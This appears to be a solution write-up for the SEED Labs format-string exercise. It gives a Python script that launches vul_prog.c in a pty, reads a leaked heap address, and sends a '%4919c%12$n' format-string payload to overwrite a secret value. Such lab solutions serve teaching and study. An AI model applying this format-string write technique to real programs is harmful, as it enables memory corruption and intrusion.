pwn: Arch Linux gcc-multilib 5.3.0-5 gcc vul_prog.c -o a (x86-64)

a.py

#!/usr/bin/env python3
# http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String/files/vul_prog.c  x86-64
import pty, os, re, struct, subprocess, sys

def readuntil(f, delim):
    data = b''
    while not (data.endswith(delim) if type(delim) == bytes else delim.search(data)):
        c = f.read(1)
        data += c
        if not c:
            break
    if type(delim) != bytes:
        data = delim.search(data)
    return data

def main():
    #s = subprocess.Popen('/tmp/a', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
    master, slave = pty.openpty()
    sub = subprocess.Popen('/tmp/a', stdin=slave, stdout=slave, stderr=slave)
    s = os.fdopen(master, 'r+b', buffering=0)

    # printf("The variable secret's value is 0x%8x (on heap)\n", (unsigned int)secret);
    h_secret = int(readuntil(s, re.compile(rb'0x +([\w+]+) \(on heap\)\r\n')).group(1), 16)
    print('%016x' % h_secret)

    readuntil(s, b'Please enter a decimal integer\r\n')
    s.write(b'0\n')

    readuntil(s, b'Please enter a string\r\n')
    #         012345670123456701234567
    s.write(b'%4919c%12$n.....'+struct.pack('Q', h_secret+4).rstrip(b'\0')+b'\n')

    # printf("The original secrets: 0x%x -- 0x%x\n", SECRET1, SECRET2);
    sys.stdout.write(readuntil(s, b'The original').decode('latin-1'))
    sys.stdout.write(readuntil(s, b'\r\n').decode('latin-1'))

    # printf("The new secrets:      0x%x -- 0x%x\n", secret[0], secret[1]);
    sys.stdout.write(readuntil(s, b'\r\n').decode('latin-1'))

    # %9$lx  secret   %10$lx user_input

main()

http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String/files/vul_prog.c